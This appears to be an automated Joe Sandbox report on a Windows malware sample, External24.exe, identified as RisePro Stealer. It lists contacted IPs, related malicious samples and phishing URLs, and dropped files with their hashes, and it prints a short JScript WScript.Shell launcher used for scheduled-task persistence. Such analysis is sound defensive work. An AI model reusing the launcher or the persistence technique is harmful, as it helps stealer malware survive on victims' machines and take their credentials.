http://www.winimage.com/zLibDll	Lawyers.pif, Lawyers.pif, 00000015.00000002.3501008072.0000000000B50000.00000040.00000400.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://support.mozilla.org	D87fZN3R3jFeplaces.sqlite.21.dr	false	URL Reputation: safe	unknown
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	lsqPckitCOdaHistory.21.dr, ZriO6tn8Siv1History.21.dr	false	Avira URL Cloud: safe	unknown
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	Lawyers.pif, 00000015.00000003.3019900839.000000000618E000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3018511190.000000000616D000.00000004.00000020.00020000.00000000.sdmp, Lawyers.pif, 00000015.00000003.3021958870.000000000619A000.00000004.00000020.00020000.00000000.sdmp, 0ffAoFEXM0xBWeb Data.21.dr, IXuJ06djpYzdWeb Data.21.dr, Z7Yuxtpi7pUyWeb Data.21.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
34.117.186.192	ipinfo.io	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
3.36.173.8	unknown	United States	8987	AMAZONEXPANSIONGB	true
172.67.75.166	db-ip.com	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1464408
Start date and time:	2024-06-28 19:50:14 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 10m 19s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Run name:	Run with higher sleep bypass
Number of analysed new started processes analysed:	25
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	External24.exe
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@30/75@3/3
EGA Information:	Successful, ratio: 100%
HCA Information:	Successful, ratio: 97% Number of executed functions: 80 Number of non-executed functions: 317
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: External24.exe

Simulations

Behavior and APIs

Time	Type	Description
13:51:41	API Interceptor	3538x Sleep call for process: Lawyers.pif modified
18:51:07	Task Scheduler	Run new task: PixelFlow path: wscript s>//B "C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.js"

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
34.117.186.192	Raptor.HardwareService.Setup_2.3.6.0.msi	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	HP-patchedUS-deobfuscated.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/
	HP-patchedUS-deobfuscated.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/
	HP-patchedUS-deobfuscated.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/
	SecuriteInfo.com.Win32.Evo-gen.24318.16217.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	SecuriteInfo.com.Win32.Evo-gen.28489.31883.exe	Get hash	malicious	Unknown	Browse	ipinfo.io/json
	Raptor.HardwareService.Setup 1.msi	Get hash	malicious	Unknown	Browse	ipinfo.io/ip
	Conferma_Pdf_Editor.exe	Get hash	malicious	Planet Stealer	Browse	ipinfo.io/
	Conferma_Pdf_Editor.exe	Get hash	malicious	Planet Stealer	Browse	ipinfo.io/
	w.sh	Get hash	malicious	Xmrig	Browse	/ip
172.67.75.166	rise2406.exe	Get hash	malicious	RisePro Stealer	Browse
	http://luxury-sherbet-tk1111-10e1b5.netlify.app/form.html	Get hash	malicious	Unknown	Browse
	https://cn10.pages.dev/appeal_case_ID/	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	RisePro Stealer	Browse
	YnsEArPlqx.exe	Get hash	malicious	RisePro Stealer	Browse
	T17sbXrL3i.exe	Get hash	malicious	RisePro Stealer	Browse
	file.exe	Get hash	malicious	RisePro Stealer	Browse
	https://curious-kringle-id4964-024b3b3.netlify.app/form.html	Get hash	malicious	Unknown	Browse
	4Ip0IVHqJ3.exe	Get hash	malicious	RisePro Stealer	Browse
	https://gacw-no-reply-restriction-appeal-case.netlify.app/feedback_id_38258467296/	Get hash	malicious	Unknown	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
ipinfo.io	1Cvd8TyYPm.exe	Get hash	malicious	LummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRAT	Browse	34.117.186.192
	k43lWDu3AB.exe	Get hash	malicious	DCRat	Browse	34.117.186.192
	https://t4ha7.shop/	Get hash	malicious	Unknown	Browse	34.117.186.192
	BRWgvKaqbg.exe	Get hash	malicious	PureLog Stealer, RisePro Stealer, Vidar, zgRAT	Browse	34.117.186.192
	https://t4ha7.shop/	Get hash	malicious	Unknown	Browse	34.117.186.192
	SecuriteInfo.com.Malware-Cryptor.Inject.gen.12012.10605.dll	Get hash	malicious	Unknown	Browse	34.117.186.192
	SecuriteInfo.com.Malware-Cryptor.Inject.gen.12012.10605.dll	Get hash	malicious	Unknown	Browse	34.117.186.192
	FactuBoletaEletricidadCgeMAYO.msi_FactuBoletaEletricidadCgeMAYO.msi_49684.msi	Get hash	malicious	Unknown	Browse	34.117.186.192
	rise2406.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	Raptor.HardwareService.Setup_2.3.6.0.msi	Get hash	malicious	Unknown	Browse	34.117.186.192
db-ip.com	BRWgvKaqbg.exe	Get hash	malicious	PureLog Stealer, RisePro Stealer, Vidar, zgRAT	Browse	104.26.4.15
	rise2406.exe	Get hash	malicious	RisePro Stealer	Browse	172.67.75.166
	file.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15
	http://luxury-sherbet-tk1111-10e1b5.netlify.app/form.html	Get hash	malicious	Unknown	Browse	172.67.75.166
	https://le-2vr.pages.dev/appeal_case_ID/	Get hash	malicious	Unknown	Browse	104.26.5.15
	https://e23-c5p.pages.dev/appeal_case_ID/	Get hash	malicious	Unknown	Browse	104.26.5.15
	https://ml5-94x.pages.dev/appeal_case_ID/	Get hash	malicious	Unknown	Browse	104.26.5.15
	https://cn10.pages.dev/appeal_case_ID/	Get hash	malicious	Unknown	Browse	172.67.75.166
	https://verify-infraction-messages.netlify.app/appeal_case_id_561597519/	Get hash	malicious	Unknown	Browse	104.26.5.15
	90ZF1EDs9h.exe	Get hash	malicious	RisePro Stealer	Browse	104.26.5.15

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	1Cvd8TyYPm.exe	Get hash	malicious	LummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRAT	Browse	34.117.186.192
	k43lWDu3AB.exe	Get hash	malicious	DCRat	Browse	34.117.186.192
	https://t4ha7.shop/	Get hash	malicious	Unknown	Browse	34.117.186.192
	BRWgvKaqbg.exe	Get hash	malicious	PureLog Stealer, RisePro Stealer, Vidar, zgRAT	Browse	34.117.186.192
	https://t4ha7.shop/	Get hash	malicious	Unknown	Browse	34.117.186.192
	SecuriteInfo.com.Malware-Cryptor.Inject.gen.12012.10605.dll	Get hash	malicious	Unknown	Browse	34.117.186.192
	SecuriteInfo.com.Malware-Cryptor.Inject.gen.12012.10605.dll	Get hash	malicious	Unknown	Browse	34.117.186.192
	FactuBoletaEletricidadCgeMAYO.msi_FactuBoletaEletricidadCgeMAYO.msi_49684.msi	Get hash	malicious	Unknown	Browse	34.117.186.192
	rise2406.exe	Get hash	malicious	RisePro Stealer	Browse	34.117.186.192
	https://riprogramma.consegna.3-79-47-0.cprapid.com/brt/update.php?%276	Get hash	malicious	Unknown	Browse	34.117.77.79
AMAZONEXPANSIONGB	https://slack.com/help/articles/29414264463635	Get hash	malicious	Unknown	Browse	3.33.220.150
	PTT requested quotation.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	Potvrda narudzbe u prilogu.exe	Get hash	malicious	DBatLoader, FormBook	Browse	3.33.130.190
	Gabrielle Miller Salary increament Form on Wednesday.pdf	Get hash	malicious	HTMLPhisher	Browse	52.223.40.198
	RFQ - 5002172340000.exe	Get hash	malicious	FormBook	Browse	3.33.130.190
	AirWaybill_Document Pdf.exe	Get hash	malicious	FormBook	Browse	3.33.244.179
	jAyXs6UP5r.elf	Get hash	malicious	Unknown	Browse	160.1.114.78
	https://naturalresourcerecoverygroupinc.qwilr.com/Proposal-Document-ZIXTc5m7Taid	Get hash	malicious	HTMLPhisher	Browse	52.223.17.81
	call_Playback_vertexone.net.html	Get hash	malicious	HTMLPhisher	Browse	52.223.40.198
	http://www6.parrish.com	Get hash	malicious	Unknown	Browse	3.33.243.145
CLOUDFLARENETUS	https://ess.barracudanetworks.com/log/message_content/189089/1719593389-112068-12672-7608-1/Refer%20to%20the%20attached	Get hash	malicious	HTMLPhisher	Browse	162.247.243.29
	http://ney.r-e.kr/mar/tys.txt	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://t.ly/sDx5T	Get hash	malicious	Phisher	Browse	104.21.61.175
	https://fhdqc8.fi59.fdske.com/ec/gAAAAABmfGZyxTh2_K7pHFLC0GqgMqzWDGy5rzOEXF5rWzzKyIh9SQQExFxMQ4awca19AuE2VvhAc9xMu62rgsB6VoJB4N9_fBGtHi3bqIWidSZzaqe6vAuqfJ2HLS_07LjIIFB3TPyWrVCoDPci0vJbEOdFpQbvgMhQ2bb5wwjc0QCyYMs2huEbMV0bF6VlM0VyKvcYrSXwroV9aI7YNrZVFratXAJOXua81IBgQ_lBlo0qGGQdFoqJacHMDkjGxuYp664Cy1FCW8W0d91K8bj980Cvliw9OLQxlehUsXbXZowsYCsVKv0Fne-F6gv0Krh2AVe-ilbzwDq1zcnJIobjeErIHapsGWTJtbLVauq4zhAsYdUWRkCB9SiulS3R7ML3XCRzZ_QN	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	http://sdfa.liveblog365.com/ares/hades.txt	Get hash	malicious	Unknown	Browse	1.1.1.1
	https://airpetsinternational.com/cwt-veteran/	Get hash	malicious	Unknown	Browse	104.17.24.14
	http://airtable.com/appj5VIpbxajOmHks/shriuPcM6YsXqcT9G	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
	test.exe	Get hash	malicious	LummaC	Browse	188.114.96.3
	30 - 3050324.scr.exe	Get hash	malicious	Remcos	Browse	188.114.96.3
	https://link.edgepilot.com/s/00344350/68BCtRZJtEijZV_Ss2rZtg?u=http://links.notification.intuit.com/ls/click?upn=u001.4HBRtPy8j6uXsK2aeX2RzAh5EFPhCIIFV3VEN-2Fx7CtL7yL0rqbEG5To4Yn7gWqQ9aLy0xQjXtfA1aWI51jOBcqCnHJrGOKkWEpk76XMNtCoKiYVPGVkYW4pqtGDVg3d1U5Hawh-2FacRZuCYTGyVuxWYYGm1-2F-2B4hsBImPSqAX0WX3WjCQTX7xXTplELi0c8bhBMfCl4SB-2Bc0p0RIFmi7WZNzk9OTy5SlZeZ4SOIQ0m44FTGZZ-2BVW-2F74ns4dkgKMbfXAWbjmeVOhbMp4L31WSel0Q-3D-3DSGIL_0QuT3MQptWCJ1pg0LLnMrMXZS5Gfo-2BwHAS-2BWm85DSt59SXq1v644VkncAfohMG6uQ86Db24jQzSfWbP-2F-2FZhau7caH92-2Fm-2BoTAs0GoBGn8EDYy4V1QCxaWW-2BqABO73nrgD-2B1uZqozRBTgELcO3bonhgIhDcQ4w-2BH5fiTFzmcQdBh3HWOLyzkBB21IAUZA3UfB74S9zvum86We-2FL-2F5T9u31iyqDT1ED148vr9QkfvP-2B3onCpVd-2BY-2FUsV-2BkYLFueSX9C-2FwjbktjnU75ob3oHwC7gGKH-2BiCGvcxjZ3pQ4lnasAVtku8mzy9YF6LnbnjZdPTMuH8b6OTXIWtdjQMwEAhr-2B-2FrCAo-2Fj12QgpwTlA2mxzSs7sxzU47f-2B52JlmDxzqA8fxe9gpbqHcrWhgK2nSyvT0KUKzpgMzj8zmj3eVdomtTmB-2B2vCMWVnlzOKHH5RcaoFiZ4WpQRi6xruNN-2Bhc9Fbz0rmLyxOJ3BgPxZOvn1DbCGJ-2BX4ObZa-2BOAapP4EwipPjIpJJydtcUWnUVcfmzsaW7yxQveSrL6feOlvICEl2Z2qd9GTvWA5IJHTtkPMhaEDJPWqK8IVB7wEWEDU0b5PUzOuerAY59Rqk5bFwEJP4169h-2F-2Fl02ldRKEXKceYuqBGYB7WiSdq4ngSVE3uhlpUHjCrSxafgTVscGTnlLBJ7XiTpzZg2cJgkxwP2snhedIHS	Get hash	malicious	Unknown	Browse	104.18.11.207

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	test.exe	Get hash	malicious	LummaC	Browse	34.117.186.192 172.67.75.166
	Alinco Pipe Supply FE Product Specification & Drawing DESIGN.xls	Get hash	malicious	Unknown	Browse	34.117.186.192 172.67.75.166
	pconsnap.dll.dll	Get hash	malicious	Unknown	Browse	34.117.186.192 172.67.75.166
	pconsnap.dll.dll	Get hash	malicious	Unknown	Browse	34.117.186.192 172.67.75.166
	1Cvd8TyYPm.exe	Get hash	malicious	LummaC, Mars Stealer, PureLog Stealer, Stealc, Vidar, Xmrig, zgRAT	Browse	34.117.186.192 172.67.75.166
	https://cloudflare-workers-pages-vless-2gi.pages.dev/	Get hash	malicious	Unknown	Browse	34.117.186.192 172.67.75.166
	New PO -39850-1064 -2084-GEN101 -Order,xls.exe	Get hash	malicious	AgentTesla, DBatLoader, PureLog Stealer	Browse	34.117.186.192 172.67.75.166
	LavMqtzZNw.exe	Get hash	malicious	LummaC, SmokeLoader	Browse	34.117.186.192 172.67.75.166
	Potvrda narudzbe u prilogu.exe	Get hash	malicious	DBatLoader, FormBook	Browse	34.117.186.192 172.67.75.166
	am.exe	Get hash	malicious	Amadey	Browse	34.117.186.192 172.67.75.166

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif	9444f34a94d494a78e19e19f4e1615744e500aca97a56.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	i9TWeCgYBy.exe	Get hash	malicious	RedLine	Browse
	SHabaB.exe	Get hash	malicious	Unknown	Browse
	SHabaB.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	383734f46f2f29f9111af90cdf9dc3b3e6ea2e23e238a.exe	Get hash	malicious	RedLine	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif	9444f34a94d494a78e19e19f4e1615744e500aca97a56.exe	Get hash	malicious	Mars Stealer, Stealc, Vidar	Browse
	i9TWeCgYBy.exe	Get hash	malicious	RedLine	Browse
	SHabaB.exe	Get hash	malicious	Unknown	Browse
	SHabaB.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	383734f46f2f29f9111af90cdf9dc3b3e6ea2e23e238a.exe	Get hash	malicious	RedLine	Browse
	file.exe	Get hash	malicious	Unknown	Browse
	file.exe	Get hash	malicious	Unknown	Browse

Created / dropped Files

C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.js

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	181
Entropy (8bit):	4.690008060689819
Encrypted:	false
SSDEEP:	3:RiMIpGXJO9obdPHo55wWAX+Ro6p4EkD51MdA7JoMD5BJuc5uWAX+Ro6p4EkD51M0:RiJuOybJHonwWDKaJkDrcA9oMDhucwWC
MD5:	2B42E6802B0196DD0AD61B9DBDF0340D
SHA1:	FE3465962BDE8E18C2FAE0D8E38292DFE108EC10
SHA-256:	D34DDD8CB865EB570BA7684D78CA4D9759F384673B15E6B1AE0B7702E03C8C13
SHA-512:	578A53B64588EF5722C7C02A0A35687615FDD84D8F43D58BA532A39BA5C9E26C1175EF7E61286E5207C6CD3B859AC0BBCCA087842D09A6E5037E59C4D18E4A5D
Malicious:	true
Preview:	new ActiveXObject("Wscript.Sh" + "ell").Exec("\"C:\\Users\\user\\AppData\\Local\\PixelFlow Creations\\PixelFlow.pif\" \"C:\\Users\\user\\AppData\\Local\\PixelFlow Creations\\m\"")

C:\Users\user\AppData\Local\PixelFlow Creations\PixelFlow.pif

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	937776
Entropy (8bit):	6.777413141364669
Encrypted:	false
SSDEEP:	12288:FJV3REMvnCG22lhtjVoAYxQl+u13a/sVyaVeK56ORMkkOlPlNKlga4Umff2lRO:F3hEW3hlVodGl+gUKrMkzXa4P6RO
MD5:	B06E67F9767E5023892D9698703AD098
SHA1:	ACC07666F4C1D4461D3E1C263CF6A194A8DD1544
SHA-256:	8498900E57A490404E7EC4D8159BEE29AED5852AE88BD484141780EAADB727BB
SHA-512:	7972C78ACEBDD86C57D879C12CB407120155A24A52FDA23DDB7D9E181DD59DAC1EB74F327817ADBC364D37C8DC704F8236F3539B4D3EE5A022814924A1616943
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 9444f34a94d494a78e19e19f4e1615744e500aca97a56.exe, Detection: malicious, Browse Filename: i9TWeCgYBy.exe, Detection: malicious, Browse Filename: SHabaB.exe, Detection: malicious, Browse Filename: SHabaB.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 383734f46f2f29f9111af90cdf9dc3b3e6ea2e23e238a.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR..........................PE..L...y..U.........."..............................@.................................w.....@...@.......@.....................L...\|....................8..0....0...q...;..............................@X..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...............................@..@.reloc...q...0...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\PixelFlow Creations\m

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	data
Category:	dropped
Size (bytes):	1869555
Entropy (8bit):	7.999882843244972
Encrypted:	true
SSDEEP:	49152:ORnQt1rnNwmwt24O3+4ZE2jrzNtFOefep4s2H:OirNL3+qEsHNuONR
MD5:	75C22B49FEFDB626B1D11CD3223828D5
SHA1:	1C66F590FA8D69A63444BE0682AC3504D63712A9
SHA-256:	F35D6AB3D8AB0AB1C7841515119C5C4EE96B6DCA82924E840F233D1511E111F9
SHA-512:	1CE806864E607B3FF47D2EB9B6CF3F6FA575F36056569A27158FE919019E5CECE4B55CD84066267A9DF0E0AA5C929F36DFF7F145C29CD625A1DEBC71D50996EC
Malicious:	true
Preview:	.X...o...S..M9..7]nd;.f.vw.$....3..w.u9.t..."....[......2.KA.#x.....$..."S..e.sC? ...`A..O.....&%..y...B...+(G....9.'..`. (Q8.h...?...:4E.N..e...(.p..N.h.....c.hD....J.K. .....i.98...Ub._.:..!x!..q>.-....3..T../_..4A.....9..0g.6.....D..8,..F..}.bI-\M.t..n.7......5.Q....s'.?......h..lT.T?..).'B.H..5.D^fghl..^4..E"..B5>...JH\|.A.Y..g2.m....`..S.. u~..x}.<...O.w#o,...U.UW.gU.5!......1...d.}:.\|0..k.["%T.)\..]..3.+...S...v.......2...[..I..f.......?>.K.^.eM.T...f~':....!r..I..?.GCD...WX._W.K.......l........ t..".Y.T#.cp&.1....~`..7..T..7<..s.n.Y.=I -9..lU.y,.f.2e.l....,3....{v..".}..J.L.O_.F. ..}..=0s..%.Z?..sC\..h.V...M!...yr...._...%I...[w......./;g&..........^..%p.. \....(..J.e....j..BR..}..0....54....>...x...~.&._.w..%(a..C.W.K.q....G..{...1...F5....V.KY\|F!.k.....0.Z._.,..c.....V..\.:..yZ..e$.<..3....w..U..xd.S......C..O....'..R....6.......{i.mDFaYZ.....$..?......"..)...m.)./..M4.Q...>...X...h.MKv.q.1...q..N.m....=.m.p.gS

C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	937776
Entropy (8bit):	6.777413141364669
Encrypted:	false
SSDEEP:	12288:FJV3REMvnCG22lhtjVoAYxQl+u13a/sVyaVeK56ORMkkOlPlNKlga4Umff2lRO:F3hEW3hlVodGl+gUKrMkzXa4P6RO
MD5:	B06E67F9767E5023892D9698703AD098
SHA1:	ACC07666F4C1D4461D3E1C263CF6A194A8DD1544
SHA-256:	8498900E57A490404E7EC4D8159BEE29AED5852AE88BD484141780EAADB727BB
SHA-512:	7972C78ACEBDD86C57D879C12CB407120155A24A52FDA23DDB7D9E181DD59DAC1EB74F327817ADBC364D37C8DC704F8236F3539B4D3EE5A022814924A1616943
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 9444f34a94d494a78e19e19f4e1615744e500aca97a56.exe, Detection: malicious, Browse Filename: i9TWeCgYBy.exe, Detection: malicious, Browse Filename: SHabaB.exe, Detection: malicious, Browse Filename: SHabaB.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: 383734f46f2f29f9111af90cdf9dc3b3e6ea2e23e238a.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R..R..R...C..P.....S.._@..a.._@....._@..g..[j..[..[j..w..R.+.r...........S.._@..S..R...P.....S..RichR..........................PE..L...y..U.........."..............................@.................................w.....@...@.......@.....................L...\|....................8..0....0...q...;..............................@X..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...............................@..@.reloc...q...0...r..................@..B................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\292668\r

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	1869555
Entropy (8bit):	7.999882843244972
Encrypted:	true
SSDEEP:	49152:ORnQt1rnNwmwt24O3+4ZE2jrzNtFOefep4s2H:OirNL3+qEsHNuONR
MD5:	75C22B49FEFDB626B1D11CD3223828D5
SHA1:	1C66F590FA8D69A63444BE0682AC3504D63712A9
SHA-256:	F35D6AB3D8AB0AB1C7841515119C5C4EE96B6DCA82924E840F233D1511E111F9
SHA-512:	1CE806864E607B3FF47D2EB9B6CF3F6FA575F36056569A27158FE919019E5CECE4B55CD84066267A9DF0E0AA5C929F36DFF7F145C29CD625A1DEBC71D50996EC
Malicious:	true
Preview:	.X...o...S..M9..7]nd;.f.vw.$....3..w.u9.t..."....[......2.KA.#x.....$..."S..e.sC? ...`A..O.....&%..y...B...+(G....9.'..`. (Q8.h...?...:4E.N..e...(.p..N.h.....c.hD....J.K. .....i.98...Ub._.:..!x!..q>.-....3..T../_..4A.....9..0g.6.....D..8,..F..}.bI-\M.t..n.7......5.Q....s'.?......h..lT.T?..).'B.H..5.D^fghl..^4..E"..B5>...JH\|.A.Y..g2.m....`..S.. u~..x}.<...O.w#o,...U.UW.gU.5!......1...d.}:.\|0..k.["%T.)\..]..3.+...S...v.......2...[..I..f.......?>.K.^.eM.T...f~':....!r..I..?.GCD...WX._W.K.......l........ t..".Y.T#.cp&.1....~`..7..T..7<..s.n.Y.=I -9..lU.y,.f.2e.l....,3....{v..".}..J.L.O_.F. ..}..=0s..%.Z?..sC\..h.V...M!...yr...._...%I...[w......./;g&..........^..%p.. \....(..J.e....j..BR..}..0....54....>...x...~.&._.w..%(a..C.W.K.q....G..{...1...F5....V.KY\|F!.k.....0.Z._.,..c.....V..\.:..yZ..e$.<..3....w..U..xd.S......C..O....'..R....6.......{i.mDFaYZ.....$..?......"..)...m.)./..M4.Q...>...X...h.MKv.q.1...q..N.m....=.m.p.gS

C:\Users\user\AppData\Local\Temp\7yC9aM3nOPMh37Qvw5GmIXM.zip

Download File

Process:	C:\Users\user\AppData\Local\Temp\292668\Lawyers.pif
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	690831
Entropy (8bit):	7.997922934972249
Encrypted:	true
SSDEEP:	12288:0H6hF05zD9MWdY2Hvh6ZqpmPagkIFXFr0YgI8Csfeb1pqz6wi8K+2r:NE5zDiYY2H4TlXIy1pd8KL
MD5:	2ED1353B170C750DE7063B1986DEE3B4
SHA1:	B65D4FD77CF60E0C30057A9EBBD9E43907E738FA
SHA-256:	A593131F186340B6A6FE500C730AB6DBCC6B360ABCEB2E6135AEFB7C68CD7F60
SHA-512:	EF5D88DCC698EEA4BD5F4A03904ED2A52471B254849CB0DD3C4A06B6F83217FCC8AAE43C4A2CDD7C591931454BFA7D7A4907C9F1A54F4EE0E84EB84B1FF1240C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_RiseProStealer, Description: Yara detected RisePro Stealer, Source: C:\Users\user\AppData\Local\Temp\7yC9aM3nOPMh37Qvw5GmIXM.zip, Author: Joe Security
Preview:	PK.........n.X................Browsers\..PK.........n.X................Browsers\Chrome\..PK.........n.X................Browsers\Chrome\Default\..PK.........n.XQn.+........#...Browsers\Chrome\Default\Cookies.txt.G..r...U.#.5C.....s$..-.D...7.\..$.G.)o....:....Z.C.f_..pm............"..t..t....}.k.@...a.2+P`.0.x.>....s..k%.._..b..P..((......B.....`.7..-m..JY..F....E..l.....I..&.....<J..M.......,V...)b.....Q..k......M?.5L....h}......X..'.0..tB.G...\;.a....4.......B4.......J.4.6.y:....4.-.UfE...3Ap.U5UX....Z.g:e.j.C..Bw..........e..a^.vU:....$..U......B..`._.e.....+...9.{u...7.e...H.]02...%yR".0...x...P<..N....R.}....{.G...;..c..x...kw.'S>.d\|.....B..k.9.t.!>.rh...~n.[....s#/....`.!..Kb8%&.vZB`....O\|.....>K......L...d0..03..t...T&.......`N.xp.."..J.......Q.....c..5...).Z.91.6.j..G.....Wr...a.52!..(^.U.....6....dB.D.^...7..0H.\J9.H.$^`e"..d...\....B.8Z=.qeP.3Y.>..'W.X..T..>z...,..K......g....%B.w4#...;.[]u\|....v...3.;L..U?..b.....u..*..

C:\Users\user\AppData\Local\Temp\Accidents

Download File

Process:	C:\Users\user\Desktop\External24.exe
File Type:	data
Category:	dropped
Size (bytes):	187392
Entropy (8bit):	7.998876666368814
Encrypted:	true
SSDEEP:	3072:Mh8Nbq//MM08pyaHaV2H8fZCCiRnOdnj8NT0E94kZinl1MHdjGFLbxcs+:Mhf/Coa4H6ZCCil+g4E94KilS9jcLbWb
MD5:	0E6A2C91997604F59DE9B6DDEC6AFAEA
SHA1:	32BCA10E1DBB29428D19A3D2E71C6606C2F8E953
SHA-256:	27119FD62B46A840203D09A2CFE60771129A7FACA326F840E1C9E3A2053C8999
SHA-512:	03F95DFDC6D9C8E71465B2A19EF580D015A92B06CB85D544DA2D7AD04D780A43F84555B42AC53060CA71F3CBBE0D35CF9C5D52B2ED9A7CB94E6298BB96737A9D
Malicious:	true
